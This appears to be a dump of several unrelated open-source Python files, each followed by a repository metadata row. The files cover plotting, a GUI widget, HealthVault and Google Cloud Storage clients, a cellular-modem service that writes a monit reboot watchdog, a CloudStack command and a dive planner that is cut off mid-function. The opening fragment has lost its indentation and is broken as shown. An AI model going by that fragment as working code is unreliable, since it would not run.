# fractional abundance, Zeff, Zmean
y_selected = y_bar.select_times(ne_tau)
for y in y_selected:
#ax3.semilogy(r, y.y[-1,:].T*100, color='black')
#lines = ax4.plot(r, y.effective_charge(impurity_fraction),
# color='black', ls='--')
rad = atomic.Radiation(y, impurity_fraction=impurity_fraction)
total_power = rad.power['total']
ax4.plot(r, total_power)
radiation_parameter = total_power / (impurity_fraction * density)
line, = ax5.plot(r, radiation_parameter)
rlte = normalized_gradient(r, temperature)
rlrad = normalized_gradient(r, total_power)
ax6.plot(r, rlrad)
ax6.plot(r, rlte, 'k--')
ax6.set_ylim(0,10)
#from matplotlib.ticker import FormatStrFormatter
#ax = ax3
#major_formatter = FormatStrFormatter('$%d\%%$')
#ax.yaxis.set_major_formatter(major_formatter)
#y.annotate_ionisation_stages(lines_abundance)
from matplotlib.ticker import MaxNLocator
ax = ax4
locator = MaxNLocator(4)
ax.set_ylabel(r'$Z_\mathrm{eff}$')
ax.yaxis.set_major_locator(locator)
lo, hi = ax.get_ylim()
ax.set_ylim(lo, 1.1 * hi)
annotate_lines(texts, ha='left', va='bottom', ax=ax)
# radiation profile
ax = ax5
ax.set_yticks(ax.get_yticks()[:-1:2])
annotate_lines(texts, ha='left', va='bottom', ax=ax)
locator = MaxNLocator(4)
ax.yaxis.set_major_locator(locator)
# position subplots
for ax in f.axes:
if not ax.is_last_row(): ax.get_xaxis().label.set_visible(False)
ax.label_outer()
#f.subplots_adjust(hspace=0)
plt.draw()
plt.show()
| mit | -2,027,741,804,067,600,400 | 23.087591 | 69 | 0.680606 | false | 2.614897 | false | false | false |
krfkeith/enough | livec/codegui/EnumWidget.py | 3 | 1748 | # Copyright (c) 2007 Enough Project.
# See LICENSE for details.
from gui.Box import VBox, HBox
from gui.TextEdit import TextEdit, make_label
from codegui.loop import loop
from codegui.widget_for import NormalWidgetMaker, indented
import style
from lib.observable.List import List
from functools import partial
class EnumWidget(VBox):
# TODO: emphasize_value should be a proxy?
def __init__(self, enum_proxy, emphasize_value=None):
self.enum = enum_proxy.get()
self._comma = make_label(style.comma, ',')
values_box = VBox(List([
self._value_widget(value_proxy, index!=len(self.enum.values)-1,
emphasize_value)
for index, value_proxy in enumerate(self.enum.values)
]))
VBox.__init__(self, List([
HBox(List([
make_label(style.enum, 'enum'),
make_label(style.space, ' '),
make_label(style.type_, loop.namer.get_name(self.enum)),
]), relay_focus=True),
make_label(style.braces, '{'),
indented(values_box),
HBox(List([
make_label(style.braces, '}'),
make_label(style.semicolon, ';'),
]), relay_focus=True)
]))
def _value_widget(self, value_proxy, with_comma, emphasize_value):
value = value_proxy.get()
s = style.enum_value
if value is emphasize_value:
s = style.emphasize(s)
l = [
TextEdit(s, partial(loop.namer.get_name, value)),
make_label(style.operator, ' = '),
NormalWidgetMaker.make(value.value),
]
if with_comma:
l.append(self._comma)
return HBox(List(l))
| gpl-3.0 | -7,926,893,740,873,075,000 | 32.615385 | 75 | 0.566934 | false | 3.70339 | false | false | false |
rajeevs1992/pyhealthvault | src/healthvaultlib/methods/getupdatedrecordsforapplication.py | 1 | 1686 | from lxml import etree
from healthvaultlib.methods.method import Method
from healthvaultlib.objects.updatedrecord import UpdatedRecord
from healthvaultlib.methods.methodbase import RequestBase, ResponseBase
class GetUpdatedRecordsForApplicationRequest(RequestBase):
'''
Gets a list of records for an application with things that have
been updated since a specified date.
Attributes:
updated_date Optionally provide an updated since date,
of type datetime.datetime
'''
def __init__(self):
super(GetUpdatedRecordsForApplicationRequest, self).__init__()
self.name = 'GetUpdatedRecordsForApplication'
self.version = 1
self.update_date = None
def get_info(self):
info = etree.Element('info')
if self.update_date is not None:
update_date = etree.Element('update-date')
update_date.text = self.update_date.isoformat()
info.append(update_date)
return info
class GetUpdatedRecordsForApplicationResponse(ResponseBase):
def __init__(self):
super(GetUpdatedRecordsForApplicationResponse, self).__init__()
self.name = 'GetUpdatedRecordsForApplication'
self.version = 1
self.updated_records = []
def parse_response(self, response):
self.parse_info(response)
for i in self.info.xpath('record-id'):
self.updated_records.append(UpdatedRecord(i))
class GetUpdatedRecordsForApplication(Method):
def __init__(self):
self.request = GetUpdatedRecordsForApplicationRequest()
self.response = GetUpdatedRecordsForApplicationResponse()
| mit | 4,035,345,967,672,432,000 | 32.058824 | 71 | 0.67675 | false | 4.556757 | false | false | false |
lwindg/sanji-bundle-cellular | index.py | 3 | 16773 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import os
from threading import Thread
from traceback import format_exc
from sanji.connection.mqtt import Mqtt
from sanji.core import Sanji
from sanji.core import Route
from sanji.model_initiator import ModelInitiator
from voluptuous import All, Any, Length, Match, Range, Required, Schema
from voluptuous import REMOVE_EXTRA, Optional, In
from cellular_utility.cell_mgmt import CellMgmt, CellMgmtError
from cellular_utility.cell_mgmt import CellAllModuleNotSupportError
from cellular_utility.management import Manager
from cellular_utility.vnstat import VnStat, VnStatError
from sh import rm, service
if __name__ == "__main__":
FORMAT = "%(asctime)s - %(levelname)s - %(lineno)s - %(message)s"
logging.basicConfig(level=logging.INFO, format=FORMAT)
_logger = logging.getLogger("sanji.cellular")
class Index(Sanji):
CONF_PROFILE_SCHEMA = Schema(
{
Required("apn", default="internet"):
All(Any(unicode, str), Length(0, 100)),
Optional("type", default="ipv4v6"):
In(frozenset(["ipv4", "ipv6", "ipv4v6"])),
Optional("auth", default={}): {
Required("protocol", default="none"):
In(frozenset(["none", "chap", "pap", "both"])),
Optional("username"):
All(Any(unicode, str), Length(0, 255)),
Optional("password"):
All(Any(unicode, str), Length(0, 255))
}
},
extra=REMOVE_EXTRA)
CONF_SCHEMA = Schema(
{
"id": int,
Required("enable"): bool,
Required("pdpContext"): {
Required("static"): bool,
Required("id"): int,
Required("retryTimeout", default=120): All(
int,
Any(0, Range(min=10, max=86400 - 1))
),
Required("primary"): CONF_PROFILE_SCHEMA,
Required("secondary", default={}): CONF_PROFILE_SCHEMA
},
Required("pinCode", default=""): Any(Match(r"[0-9]{4,8}"), ""),
Required("keepalive"): {
Required("enable"): bool,
Required("targetHost"): basestring,
Required("intervalSec"): All(
int,
Any(0, Range(min=60, max=86400 - 1))
),
Required("reboot",
default={"enable": False, "cycles": 1}): {
Required("enable", default=False): bool,
Required("cycles", default=1): All(
int,
Any(0, Range(min=1, max=48))),
}
}
},
extra=REMOVE_EXTRA)
def init(self, *args, **kwargs):
path_root = os.path.abspath(os.path.dirname(__file__))
self.model = ModelInitiator("cellular", path_root)
self.model.db[0] = Index.CONF_SCHEMA(self.model.db[0])
self._dev_name = None
self._mgr = None
self._vnstat = None
self.__init_monit_config(
enable=(self.model.db[0]["enable"] and
self.model.db[0]["keepalive"]["enable"] and True and
self.model.db[0]["keepalive"]["reboot"]["enable"] and
True),
target_host=self.model.db[0]["keepalive"]["targetHost"],
iface=self._dev_name,
cycles=self.model.db[0]["keepalive"]["reboot"]["cycles"]
)
self._init_thread = Thread(
name="sanji.cellular.init_thread",
target=self.__initial_procedure)
self._init_thread.daemon = True
self._init_thread.start()
def __initial_procedure(self):
"""
Continuously check Cellular modem existence.
Set self._dev_name, self._mgr, self._vnstat properly.
"""
cell_mgmt = CellMgmt()
wwan_node = None
for retry in xrange(0, 4):
if retry == 3:
return
try:
wwan_node = cell_mgmt.m_info().wwan_node
break
except CellAllModuleNotSupportError:
break
except CellMgmtError:
_logger.warning("get wwan_node failure: " + format_exc())
cell_mgmt.power_cycle(timeout_sec=60)
self._dev_name = wwan_node
self.__init_monit_config(
enable=(self.model.db[0]["enable"] and
self.model.db[0]["keepalive"]["enable"] and True and
self.model.db[0]["keepalive"]["reboot"]["enable"] and
True),
target_host=self.model.db[0]["keepalive"]["targetHost"],
iface=self._dev_name,
cycles=self.model.db[0]["keepalive"]["reboot"]["cycles"]
)
self.__create_manager()
self._vnstat = VnStat(self._dev_name)
def __create_manager(self):
pin = self.model.db[0]["pinCode"]
if "primary" in self.model.db[0]["pdpContext"]:
pdpc_primary_apn = \
self.model.db[0]["pdpContext"]["primary"].get(
"apn", "internet")
pdpc_primary_type = \
self.model.db[0]["pdpContext"]["primary"].get("type", "ipv4v6")
pdpc_primary_auth = \
self.model.db[0]["pdpContext"]["primary"].get("auth", {})
else:
pdpc_primary_apn = "internet"
pdpc_primary_type = "ipv4v6"
pdpc_primary_auth = {}
if "secondary" in self.model.db[0]["pdpContext"]:
pdpc_secondary_apn = \
self.model.db[0]["pdpContext"]["secondary"].get("apn", "")
pdpc_secondary_type = \
self.model.db[0]["pdpContext"]["secondary"].get(
"type", "ipv4v6")
pdpc_secondary_auth = \
self.model.db[0]["pdpContext"]["secondary"].get("auth", {})
else:
pdpc_secondary_apn = ""
pdpc_secondary_type = "ipv4v6"
pdpc_secondary_auth = {}
pdpc_retry_timeout = self.model.db[0]["pdpContext"]["retryTimeout"]
self._mgr = Manager(
dev_name=self._dev_name,
enabled=self.model.db[0]["enable"],
pin=None if pin == "" else pin,
pdp_context_static=self.model.db[0]["pdpContext"]["static"],
pdp_context_id=self.model.db[0]["pdpContext"]["id"],
pdp_context_primary_apn=pdpc_primary_apn,
pdp_context_primary_type=pdpc_primary_type,
pdp_context_primary_auth=pdpc_primary_auth.get("protocol", "none"),
pdp_context_primary_username=pdpc_primary_auth.get("username", ""),
pdp_context_primary_password=pdpc_primary_auth.get("password", ""),
pdp_context_secondary_apn=pdpc_secondary_apn,
pdp_context_secondary_type=pdpc_secondary_type,
pdp_context_secondary_auth=pdpc_secondary_auth.get(
"protocol", "none"),
pdp_context_secondary_username=pdpc_secondary_auth.get(
"username", ""),
pdp_context_secondary_password=pdpc_secondary_auth.get(
"password", ""),
pdp_context_retry_timeout=pdpc_retry_timeout,
keepalive_enabled=self.model.db[0]["keepalive"]["enable"],
keepalive_host=self.model.db[0]["keepalive"]["targetHost"],
keepalive_period_sec=self.model.db[0]["keepalive"]["intervalSec"],
log_period_sec=60)
# clear PIN code if pin error
if self._mgr.status() == Manager.Status.pin_error and pin != "":
self.model.db[0]["pinCode"] = ""
self.model.save_db()
self._mgr.set_update_network_information_callback(
self._publish_network_info)
self._mgr.start()
def __init_completed(self):
if self._init_thread is None:
return True
self._init_thread.join(0)
if self._init_thread.is_alive():
return False
self._init_thread = None
return True
def __init_monit_config(
self, enable=False, target_host="8.8.8.8", iface="", cycles=1):
if enable is False:
rm("-rf", "/etc/monit/conf.d/keepalive")
service("monit", "restart")
return
ifacecmd = "" if iface == "" or iface is None \
else "-I {}".format(iface)
config = """check program ping-test with path "/bin/ping {target_host} {ifacecmd} -c 3 -W 20"
if status != 0
then exec "/bin/bash -c '/usr/sbin/cell_mgmt power_off force && /bin/sleep 5 && /usr/local/sbin/reboot -i -f -d'"
every {cycles} cycles
""" # noqa
with open("/etc/monit/conf.d/keepalive", "w") as f:
f.write(config.format(
target_host=target_host, ifacecmd=ifacecmd, cycles=cycles))
service("monit", "restart")
@Route(methods="get", resource="/network/cellulars")
def get_list(self, message, response):
if not self.__init_completed():
return response(code=200, data=[])
if (self._dev_name is None or
self._mgr is None or
self._vnstat is None):
return response(code=200, data=[])
return response(code=200, data=[self._get()])
@Route(methods="get", resource="/network/cellulars/:id")
def get(self, message, response):
if not self.__init_completed():
return response(code=400, data={"message": "resource not exist"})
id_ = int(message.param["id"])
if id_ != 1:
return response(code=400, data={"message": "resource not exist"})
return response(code=200, data=self._get())
PUT_SCHEMA = CONF_SCHEMA
@Route(methods="put", resource="/network/cellulars/:id", schema=PUT_SCHEMA)
def put(self, message, response):
if not self.__init_completed():
return response(code=400, data={"message": "resource not exist"})
id_ = int(message.param["id"])
if id_ != 1:
return response(code=400, data={"message": "resource not exist"})
_logger.info(str(message.data))
data = Index.PUT_SCHEMA(message.data)
data["id"] = id_
_logger.info(str(data))
# always use the 1st PDP context for static
if data["pdpContext"]["static"] is True:
data["pdpContext"]["id"] = 1
# since all items are required in PUT,
# its schema is identical to cellular.json
self.model.db[0] = data
self.model.save_db()
if self._mgr is not None:
self._mgr.stop()
self._mgr = None
self.__create_manager()
self.__init_monit_config(
enable=(self.model.db[0]["enable"] and
self.model.db[0]["keepalive"]["enable"] and True and
self.model.db[0]["keepalive"]["reboot"]["enable"] and
True),
target_host=self.model.db[0]["keepalive"]["targetHost"],
iface=self._dev_name,
cycles=self.model.db[0]["keepalive"]["reboot"]["cycles"]
)
# self._get() may wait until start/stop finished
return response(code=200, data=self.model.db[0])
def _get(self):
name = self._dev_name
if name is None:
name = "n/a"
config = self.model.db[0]
status = self._mgr.status()
minfo = self._mgr.module_information()
sinfo = self._mgr.static_information()
cinfo = self._mgr.cellular_information()
ninfo = self._mgr.network_information()
try:
pdpc_list = self._mgr.pdp_context_list()
except CellMgmtError:
pdpc_list = []
try:
self._vnstat.update()
usage = self._vnstat.get_usage()
except VnStatError:
usage = {
"txkbyte": -1,
"rxkbyte": -1
}
# clear PIN code if pin error
if (config["pinCode"] != "" and
status == Manager.Status.pin):
config["pinCode"] = ""
self.model.db[0] = config
self.model.save_db()
config["pdpContext"]["primary"] = \
Index.CONF_PROFILE_SCHEMA(config["pdpContext"]["primary"])
config["pdpContext"]["secondary"] = \
Index.CONF_PROFILE_SCHEMA(config["pdpContext"]["secondary"])
config["pdpContext"]["list"] = pdpc_list
return {
"id": config["id"],
"name": name,
"mode": "" if cinfo is None else cinfo.mode,
"signal": {"csq": 0, "rssi": 0, "ecio": 0.0} if cinfo is None else
{"csq": cinfo.signal_csq,
"rssi": cinfo.signal_rssi_dbm,
"ecio": cinfo.signal_ecio_dbm},
"operatorName": "" if cinfo is None else cinfo.operator,
"lac": "" if cinfo is None else cinfo.lac,
"tac": "" if cinfo is None else cinfo.tac,
"nid": "" if cinfo is None else cinfo.nid,
"cellId": "" if cinfo is None else cinfo.cell_id,
"bid": "" if cinfo is None else cinfo.bid,
"imsi": "" if sinfo is None else sinfo.imsi,
"iccId": "" if sinfo is None else sinfo.iccid,
"imei": "" if minfo is None else minfo.imei,
"esn": "" if minfo is None else minfo.esn,
"pinRetryRemain": (
-1 if sinfo is None else sinfo.pin_retry_remain),
"status": status.name,
"mac": "00:00:00:00:00:00" if minfo is None else minfo.mac,
"ip": "" if ninfo is None else ninfo.ip,
"netmask": "" if ninfo is None else ninfo.netmask,
"gateway": "" if ninfo is None else ninfo.gateway,
"dns": [] if ninfo is None else ninfo.dns_list,
"usage": {
"txkbyte": usage["txkbyte"],
"rxkbyte": usage["rxkbyte"]
},
"enable": config["enable"],
"pdpContext": config["pdpContext"],
"pinCode": config["pinCode"],
"keepalive": {
"enable": config["keepalive"]["enable"],
"targetHost": config["keepalive"]["targetHost"],
"intervalSec": config["keepalive"]["intervalSec"],
"reboot": {
"enable": config["keepalive"]["reboot"]["enable"],
"cycles": config["keepalive"]["reboot"]["cycles"]
}
}
}
def _publish_network_info(
self,
nwk_info):
name = self._dev_name
if name is None:
_logger.error("device name not available")
return
data = {
"name": name,
"wan": True,
"type": "cellular",
"mode": "dhcp",
"status": nwk_info.status,
"ip": nwk_info.ip,
"netmask": nwk_info.netmask,
"gateway": nwk_info.gateway,
"dns": nwk_info.dns_list
}
_logger.info("publish network info: " + str(data))
self.publish.event.put("/network/interfaces/{}".format(name),
data=data)
@Route(methods="get", resource="/network/cellulars/:id/firmware")
def get_fw(self, message, response):
if not self.__init_completed():
return response(code=400, data={"message": "resource not exist"})
id_ = int(message.param["id"])
if id_ != 1:
return response(code=400, data={"message": "resource not exist"})
m_info = self._mgr._cell_mgmt.m_info()
if m_info.module != "MC7354":
return response(code=200, data={
"switchable": False,
"current": None,
"preferred": None,
"avaliable": None
})
fw_info = self._mgr._cell_mgmt.get_cellular_fw()
return response(code=200, data=fw_info)
@Route(methods="put", resource="/network/cellulars/:id/firmware")
def put_fw(self, message, response):
if not self.__init_completed():
return response(code=400, data={"message": "resource not exist"})
id_ = int(message.param["id"])
if id_ != 1:
return response(code=400, data={"message": "resource not exist"})
response(code=200)
self._mgr._cell_mgmt.set_cellular_fw(
fwver=message.data["fwver"],
config=message.data["config"],
carrier=message.data["carrier"]
)
if __name__ == "__main__":
cellular = Index(connection=Mqtt())
cellular.start()
| gpl-2.0 | -4,546,295,228,002,981,000 | 35.863736 | 117 | 0.524593 | false | 3.895262 | true | false | false |
wxiang7/airflow | airflow/contrib/hooks/gcloud/gcs_hook.py | 3 | 5781 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from future.standard_library import install_aliases
install_aliases()
from airflow.contrib.hooks.gcloud.base_hook import GCPBaseHook
from urllib.parse import urlparse
from airflow.utils import AirflowException
import gcloud.storage
def parse_gcs_url(gsurl):
"""
Given a Google Cloud Storage URL (gs://<bucket>/<blob>), returns a
tuple containing the corresponding bucket and blob.
"""
parsed_url = urlparse(gsurl)
if not parsed_url.netloc:
raise AirflowException('Please provide a bucket name')
else:
bucket = parsed_url.netloc
blob = parsed_url.path.strip('/')
return (bucket, blob)
class GCSHook(GCPBaseHook):
client_class = gcloud.storage.Client
def bucket_exists(self, bucket):
return self.client.bucket(bucket).exists()
def get_bucket(self, bucket):
return self.client.get_bucket(bucket)
def list_blobs(
self,
bucket,
max_results=None,
page_token=None,
prefix=None,
delimiter=None):
return self.client.bucket(bucket).list_blobs(
max_results=max_results,
page_token=page_token,
prefix=prefix,
delimiter=delimiter)
def get_blob(self, blob, bucket=None):
"""
Returns None if the blob does not exist
"""
if not bucket:
bucket, blob = parse_gcs_url(blob)
return self.client.bucket(bucket).get_blob(blob)
def blob_exists(self, blob, bucket=None):
if not bucket:
bucket, blob = parse_gcs_url(blob)
return self.client.bucket(bucket).blob(blob).exists()
def upload_from_file(
self,
file_obj,
blob,
bucket=None,
replace=False):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).blob(blob)
if gcs_blob.exists() and not replace:
raise ValueError(
'The blob {bucket}/{blob} already exists.'.format(**locals()))
gcs_blob.upload_from_file(file_obj)
def upload_from_filename(
self,
filename,
blob,
bucket=None,
replace=False):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).blob(blob)
if gcs_blob.exists() and not replace:
raise ValueError(
'The blob {bucket}/{blob} already exists.'.format(**locals()))
gcs_blob.upload_from_filename(filename)
def upload_from_string(
self,
string,
blob,
bucket=None,
replace=False):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).blob(blob)
if gcs_blob.exists() and not replace:
raise ValueError(
'The blob {bucket}/{blob} already exists.'.format(**locals()))
gcs_blob.upload_from_string(string)
def download_as_string(
self,
blob,
bucket=None):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).get_blob(blob)
if not gcs_blob:
raise ValueError(
'Blob does not exist: {bucket}/{blob}'.format(**locals()))
return gcs_blob.download_as_string()
def download_to_file(
self,
file_obj,
blob,
bucket=None):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).get_blob(blob)
if not gcs_blob:
raise ValueError(
'Blob does not exist: {bucket}/{blob}'.format(**locals()))
return gcs_blob.download_to_file(file_obj)
def download_to_filename(
self,
filename,
blob,
bucket=None):
if not bucket:
bucket, blob = parse_gcs_url(blob)
gcs_blob = self.client.bucket(bucket).get_blob(blob)
if not gcs_blob:
raise ValueError(
'Blob does not exist: {bucket}/{blob}'.format(**locals()))
return gcs_blob.download_to_filename(filename)
# Compatibility methods
def download(
self,
bucket,
object,
filename=False):
"""
This method is provided for compatibility with
contrib/GoogleCloudStorageHook.
"""
if filename:
return self.download_to_filename(
filename=filename, blob=object, bucket=bucket)
else:
return self.download_as_string(blob=object, bucket=bucket)
def upload(
self,
bucket,
object,
filename,
mime_type='application/octet-stream'):
"""
This method is provided for compatibility with
contrib/GoogleCloudStorageHook.
Warning: acts as if replace == True!
"""
self.upload_from_filename(
filename=filename, blob=object, bucket=bucket, replace=True)
| apache-2.0 | -9,131,217,837,836,201,000 | 30.418478 | 78 | 0.577755 | false | 4.22279 | false | false | false |
MissionCriticalCloud/marvin | marvin/cloudstackAPI/updateCloudToUseObjectStore.py | 1 | 1997 | """Migrate current NFS secondary storages to use object store."""
from baseCmd import *
from baseResponse import *
class updateCloudToUseObjectStoreCmd (baseCmd):
typeInfo = {}
def __init__(self):
self.isAsync = "false"
"""the image store provider name"""
"""Required"""
self.provider = None
self.typeInfo['provider'] = 'string'
"""the details for the image store. Example: details[0].key=accesskey&details[0].value=s389ddssaa&details[1].key=secretkey&details[1].value=8dshfsss"""
self.details = []
self.typeInfo['details'] = 'map'
"""the name for the image store"""
self.name = None
self.typeInfo['name'] = 'string'
"""the URL for the image store"""
self.url = None
self.typeInfo['url'] = 'string'
self.required = ["provider", ]
class updateCloudToUseObjectStoreResponse (baseResponse):
typeInfo = {}
def __init__(self):
"""the ID of the image store"""
self.id = None
self.typeInfo['id'] = 'string'
"""the details of the image store"""
self.details = None
self.typeInfo['details'] = 'set'
"""the name of the image store"""
self.name = None
self.typeInfo['name'] = 'string'
"""the protocol of the image store"""
self.protocol = None
self.typeInfo['protocol'] = 'string'
"""the provider name of the image store"""
self.providername = None
self.typeInfo['providername'] = 'string'
"""the scope of the image store"""
self.scope = None
self.typeInfo['scope'] = 'scopetype'
"""the url of the image store"""
self.url = None
self.typeInfo['url'] = 'string'
"""the Zone ID of the image store"""
self.zoneid = None
self.typeInfo['zoneid'] = 'string'
"""the Zone name of the image store"""
self.zonename = None
self.typeInfo['zonename'] = 'string'
| apache-2.0 | -6,770,195,988,446,285,000 | 33.431034 | 159 | 0.577867 | false | 3.954455 | false | false | false |
ThomasChiroux/dipplanner | dipplanner/dive.py | 1 | 43456 | #
# Copyright 2011-2016 Thomas Chiroux
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.
# If not, see <http://www.gnu.org/licenses/gpl.html>
#
# This module is part of dipplanner, a Dive planning Tool written in python
"""Dive class module.
Each Dive represent one dive (and only one)
For successive dives, it is possible to provide the parameters of the
previous dive in order to calculate the next one.
"""
import logging
import copy
# dependencies imports
from jinja2 import Environment, PackageLoader
# local imports
from dipplanner import settings
from dipplanner.dipp_exception import DipplannerException
from dipplanner.model.buhlmann.model_exceptions import ModelException
from dipplanner.tank import Tank
from dipplanner.segment import SegmentDive, SegmentDeco, SegmentAscDesc
from dipplanner.model.buhlmann.model import Model as BuhlmannModel
from dipplanner.tools import calculate_pp_h2o_surf
from dipplanner.tools import depth_to_pressure
from dipplanner.tools import seconds_to_mmss
from dipplanner.tools import seconds_to_hhmmss
from dipplanner.tools import altitude_or_depth_to_absolute_pressure
class NothingToProcess(DipplannerException):
"""Raised when the is no input segments to process."""
def __init__(self, description=""):
"""Init of the Exception.
:param str description: text describing the error
"""
super().__init__(description)
self.logger.error(
"Raising an exception: NothingToProcess ! (%s)", description)
class InstanciationError(DipplannerException):
"""Raised when the Dive constructor encounters a problem.
In this case, it can not continue
"""
def __init__(self, description=""):
"""Init of the Exception.
:param str description: text describing the error
"""
super().__init__(description)
self.logger.error(
"Raising an exception: InstanciationError ! (%s)", description)
class ProcessingError(DipplannerException):
"""Raised when the is no input segments to process."""
def __init__(self, description=""):
"""Init of the Exception.
:param str description: text describing the error
"""
super().__init__(description)
self.logger.error(
"Raising an exception: ProcessingError ! (%s)", description)
class InfiniteDeco(DipplannerException):
"""Raised when the deco time becomes enourmous (like infinite)."""
def __init__(self, description=""):
"""Init of the Exception.
:param str description: text describing the error
"""
super().__init__(description)
self.logger.error(
"Raising an exception: InfiniteDeco ! (%s)", description)
class Dive():
"""Conducts dive based on inputSegments, knownGases, and an existing model.
Iterates through dive segments updating the Model. When all
dive segments are processed then calls ascend(0.0) to
return to the surface.
The previous_profile (Model) can be either null in which case a
new model is created, or can be an existing model with tissue loadings.
Gas switching is done on the final ascent if OC deco or
bailout is specified.
Outputs profile to a List of dive segments
Attributes:
* input_segments -- (list) Stores enabled input dive segment objects
* output_segments -- (list) Stores output segments produced by this class
* tanks -- (list) Stores enabled dive tank objects
* current_tank -- current tank object
* current_depth -- current dive depth
* ambiant_pressure -- (current) ambiant pressure
* current_f_he -- current gas fraction of He
* current_f_n2 -- current gas fraction of N2
* current_f_o2 -- current gas fraction of O2
* model -- model used for this dive
* run_time -- runTime
* pp_o2 -- CCR ppO2, if OC : 0.0
* is_closed_circuit -- Flag to store CC or OC
* in_final_ascent -- flag for final ascent
* is_repetative_dive -- Flag for repetative dives
* surface_interval -- for surf. int. in seconds
* no_flight_time_value -- calculated no flight time
* metadata -- description for the dive
"""
def __init__(self, known_segments, known_tanks, previous_profile=None):
"""Init for Dive class.
For fist dive, instanciate the profile class with no model
(profile will create one for you)
For repetative dives, instanciate profile class with the previous model
:param known_segments: -- list of input segments
:type known_segments: list of :class:`dipplanner.segment.Segment`
:param known_tanks: list of tanks for this dive
:type known_tanks: list of :class:`dipplanner.tank.Tank`
:param previous_profile: model object of the precedent dive
:type previous_profile: :class:`dipplanner.model`
.. note:: the initialisation should not fail. If something if wrong, it
MUST still instantiate itself, with errors in his own object
"""
# initiate class logger
self.logger = logging.getLogger("dipplanner.dive.Dive")
self.logger.debug("creating an instance of Dive")
# initiate dive exception list
self.dive_exceptions = []
if previous_profile is None:
# new dive : new model
self.is_repetitive_dive = False
try:
self.model = BuhlmannModel() # buhlman model by default
except DipplannerException as exc:
self.dive_exceptions.append(
InstanciationError(
"Unable to instanciate model: %s" % exc))
self.metadata = ""
else:
# repetative dive
self.is_repetitive_dive = True
self.model = previous_profile.model
try:
self.model.init_gradient()
except DipplannerException as exc:
self.dive_exceptions.append(
InstanciationError(
"Unable to reset model gradients: %s" % exc))
# filter input segment for only enabled segments
self.input_segments = []
try:
for segment in known_segments:
if segment.in_use:
self.input_segments.append(segment)
except DipplannerException as exc:
self.dive_exceptions.append(
InstanciationError("Problem while adding segments: %s" % exc))
# filter lists of gases to make the used list of gases
self.tanks = []
try:
for tank in known_tanks:
if tank.in_use:
self.tanks.append(tank)
except DipplannerException as exc:
self.dive_exceptions.append(
InstanciationError("Problem while adding tanks: %s" % exc))
# initalise output_segment list
self.output_segments = []
# other initialisations
self.surface_interval = 0
self.no_flight_time_value = None
self.full_desat_time_value = None
self.is_closed_circuit = False # OC by default
self.pp_o2 = 0.0 # OC by default
self.current_tank = None
self.current_depth = 0.0
self.in_final_ascent = False
self.run_time = 0 # in second
self.metadata = ""
def __repr__(self):
"""Return a str representing the result of the dive.
Using the default template
:returns: a string with the result of the calculation of the dives
using the default template
:rtype: str
"""
return self.output("default.tpl")
def __str__(self):
"""Return a str representing the result of the dive.
Using the default template
:returns: a string with the result of the calculation of the dives
using the default template
:rtype: str
"""
return self.__repr__()
# def __cmp__(self, otherdive):
# """Compare a dive to another dive, based on run_time
# *Keyword arguments:*
# otherdive (Dive) -- another dive object
# *Returns:*
# Integer -- result of cmp()
# *Raise:*
# <nothing>
# """
# return cmp(self.run_time, otherdive.run_time)
def output(self, template=None):
"""Return the dive profile calculated.
using the template given in settings or command lines.
(and not only the default template)
:returns: a string with the result of the calculation of the dives
using the choosen template
:rtype: str
"""
env = Environment(loader=PackageLoader('dipplanner', 'templates'))
if template is None:
tpl = env.get_template(settings.TEMPLATE)
else:
tpl = env.get_template(template)
# pylint: disable=no-member
text = tpl.render(settings=settings,
dives=[self, ])
# pylint: enable=no-member
return text
def do_surface_interval(self, time):
"""Conduct a surface interval.
by performing a constant depth calculation on air at zero meters
:param int time: duration of the interval, in seconds
"""
try:
self.model.const_depth(pressure=0.0, seg_time=time,
f_he=0.0, f_n2=0.79, pp_o2=0.0)
except DipplannerException as exc:
self.dive_exceptions.append(
ModelException("Unable to do surface interval: %s" % exc))
self.surface_interval = time
if settings.AUTOMATIC_TANK_REFILL:
self.refill_tanks()
def get_surface_interval(self):
"""Return surface interval in mm:ss format.
:returns: surface interval time in mmm:ss format
:rtype: str
"""
return seconds_to_mmss(self.surface_interval)
def refill_tanks(self):
"""refile all tanks defined in this dive.
it is used for repetitive dives
"""
for tank in self.tanks:
tank.refill()
def is_dive_segments(self):
"""Return true if there are loaded dive segments.
else false means there is nothing to process
:returns: True -- if there is at least one input
dive segment to process
False -- if there is no dive segment to process
:rtype: bool
"""
return bool(len(self.input_segments) > 0)
def do_dive_without_exceptions(self):
"""Call do_dive, and handle exceptions internally.
do not raise any "dive related" exception : add the exception inside
self.dive_exceptions instead.
"""
try:
self.do_dive()
except DipplannerException as exc:
self.dive_exceptions.append(exc)
except Exception as exc: # unknown generic exception
self.dive_exceptions.append(
DipplannerException("Unknown exception occured: %s" % exc))
def do_dive(self):
"""Process the dive.
:raises NothingToProcess: if there is no input segment to process
:raises ModelException: <Exceptions from model>
"""
if self.is_dive_segments() is False:
raise NothingToProcess
# check the segments:
for seg in self.input_segments:
seg.check()
run_time_flag = settings.RUN_TIME
# sets initial state
#
# else:
first_segment = self.input_segments[0]
self.current_tank = first_segment.tank
# Sort self.tanks based on MOD ? why ? see below ?
self.tanks.sort()
self.current_depth = 0.0
self.pp_o2 = first_segment.setpoint
if self.pp_o2 == 0.0:
